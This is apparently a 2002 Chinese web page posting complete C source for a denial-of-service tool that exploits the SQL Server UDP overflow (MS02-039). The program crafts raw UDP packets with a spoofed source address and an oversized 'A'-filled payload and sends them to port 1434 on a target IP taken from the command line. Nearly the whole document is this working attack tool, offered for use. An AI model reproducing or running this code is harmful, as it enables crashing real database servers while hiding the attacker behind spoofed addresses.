AR利用SQLSERVER的UDP溢出的DOS程序源代码

/ns/wz/comp/data/20020819051622.htm

////////////////////////////////////////////////////////////
//             
// SQL Overflow dos tool
//
// Reference: MS02-039
//
// Author: refdom
// Email: refdom@263.net
// Homepage: www.opengram.com
//
////////////////////////////////////////////////////////////

#include <string.h>
#include <stdio.h>
#include <process.h>
#include <winsock2.h>
#include <ws2tcpip.h>

#pragma comment(lib,"ws2_32.lib")

#define SOURCE_PORT 53
#define DEST_PORT 1434

typedef struct ip_hdr //定义IP首部
{
unsigned char h_verlen; //4位首部长度,4位IP版本号
unsigned char tos; //8位服务类型TOS
unsigned short total_len; //16位总长度(字节)
unsigned short ident; //16位标识
unsigned short frag_and_flags; //3位标志位
unsigned char ttl; //8位生存时间 TTL
unsigned char proto; //8位协议 (TCP, UDP 或其他)
unsigned short checksum; //16位IP首部校验和
unsigned int sourceIP; //32位源IP地址
unsigned int destIP; //32位目的IP地址
}IP_HEADER;

struct //定义TCP伪首部
{
unsigned long saddr; //源地址
unsigned long daddr; //目的地址
char mbz;
char ptcl; //协议类型
unsigned short tcpl; //TCP长度
}psd_header;

typedef struct tcp_hdr //定义TCP首部
{
USHORT th_sport; //16位源端口
USHORT th_dport; //16位目的端口
unsigned int th_seq; //32位序列号
unsigned int th_ack; //32位确认号
unsigned char th_lenres; //4位首部长度/6位保留字
unsigned char th_flag; //6位标志位
USHORT th_win; //16位窗口大小
USHORT th_sum; //16位校验和
USHORT th_urp; //16位紧急数据偏移量
}TCP_HEADER;

typedef struct udp_hdr //UDP首部
{
unsigned short sourceport;
unsigned short destport;
unsigned short udp_length;
unsigned short udp_checksum;
} UDP_HEADER;

//CheckSum:计算校验和的子函数
USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum+=*buffer++;
size -=sizeof(USHORT);
}
if(size )
{
cksum += *(UCHAR*)buffer;
}
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >>16);
return (USHORT)(~cksum);
}

void Usage()
{
printf("******************************************\n");
printf("SQLOverFlowDOS(MS02-039)\n");
printf("\t Written by Refdom\n");
printf("\t Email: refdom@263.net\n");
printf("\t Homepage: www.opengram.com\n");
printf("Useage: SQLDOS.exe Fake_ip Target_ip \n");
printf("*******************************************\n");
}

void Sendudp (unsigned long ulTargetIP, unsigned long ulFakeIP)
{

SOCKET sock;
SOCKADDR_IN addr_in;
BOOL flag;
char buf[80] = {0};
IP_HEADER ipHeader;
UDP_HEADER udpHeader;
int iTotalSize, iUdpCheckSumSize, i, j;
char sendbuf[256] = {0};
char *ptr = NULL;

memset(buf, 'A', sizeof(buf) - 2);
buf[0] = 0x04;

sock = WSASocket(AF_INET,SOCK_RAW,IPPROTO_UDP,NULL,0,0);
if (sock == INVALID_SOCKET)
{
printf("socket Error!\n");
return;
}

flag = true;
if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char*)&flag,sizeof(flag))==SOCKET_ERROR)
{
printf("setsockopt Error!\n");
return;
}

iTotalSize=sizeof(ipHeader)+sizeof(udpHeader)+sizeof(buf);

ipHeader.h_verlen = (4 << 4) | (sizeof(ipHeader) / sizeof(unsigned long));
ipHeader.tos=0;
ipHeader.total_len=htons(iTotalSize);
ipHeader.ident=0;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_UDP;
ipHeader.checksum=0;
ipHeader.sourceIP = ulFakeIP;
ipHeader.destIP = ulTargetIP;

udpHeader.sourceport = htons(SOURCE_PORT);
udpHeader.destport = htons(DEST_PORT);
udpHeader.udp_length = htons(sizeof(udpHeader)+sizeof(buf));
udpHeader.udp_checksum = 0;

ptr = NULL;

//计算UDP校验和
ZeroMemory(sendbuf,sizeof(sendbuf));
ptr=sendbuf;
iUdpCheckSumSize=0;
udpHeader.udp_checksum = 0;

memcpy(ptr,&ipHeader.sourceIP,sizeof(ipHeader.sourceIP));
ptr +=sizeof(ipHeader.sourceIP);
iUdpCheckSumSize+=sizeof(ipHeader.sourceIP);

memcpy(ptr,&ipHeader.destIP,sizeof(ipHeader.destIP));
ptr +=sizeof(ipHeader.destIP);
iUdpCheckSumSize +=sizeof(ipHeader.destIP);

ptr++;
iUdpCheckSumSize++;

memcpy(ptr,&ipHeader.proto,sizeof(ipHeader.proto));
ptr +=sizeof(ipHeader.proto);
iUdpCheckSumSize +=sizeof(ipHeader.proto);

memcpy(ptr,&udpHeader.udp_length,sizeof(udpHeader.udp_length));
ptr +=sizeof(udpHeader.udp_length);
iUdpCheckSumSize +=sizeof(udpHeader.udp_length);

memcpy(ptr,&udpHeader,sizeof(udpHeader));
ptr +=sizeof(udpHeader);
iUdpCheckSumSize += sizeof(udpHeader);

for(i = 0; i < sizeof(buf); i++,ptr++)
*ptr = buf[i];
iUdpCheckSumSize += sizeof(buf);

udpHeader.udp_checksum = checksum((USHORT*)sendbuf,iUdpCheckSumSize);

ZeroMemory(sendbuf,sizeof(sendbuf));
memcpy(sendbuf,&ipHeader,sizeof(ipHeader));
memcpy(sendbuf+sizeof(ipHeader),&udpHeader,sizeof(udpHeader));
memcpy(sendbuf+sizeof(ipHeader)+sizeof(udpHeader),buf,sizeof(buf));

addr_in.sin_family = AF_INET;
addr_in.sin_port = htons(DEST_PORT);
addr_in.sin_addr.S_un.S_addr = ulTargetIP ;

printf("\n Starting send packet\n\t");

for (j = 0; j < 5; j++)
{
Sleep(500);
if (sendto(sock, sendbuf, iTotalSize, 0, (SOCKADDR *)&addr_in, sizeof(addr_in))==SOCKET_ERROR)
{
printf("Send Error!\n");
return;
}
else
{
printf(".");
}
}

printf("\n Send OK!\n");

if (sock != INVALID_SOCKET)
closesocket(sock);
}

int main(int argc, char* argv[])
{
WSADATA WSAData;
unsigned long ulTargetIP, ulFakeIP;

Usage();

if (argc < 3)
{
return false;
}

ulTargetIP = inet_addr(argv[1]);
ulFakeIP = inet_addr(argv[2]);

if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return false;
}

printf("DOS starting ...\n");

Sendudp(ulTargetIP, ulFakeIP);

printf("\nComplete!\n");


WSACleanup();

return 0;
}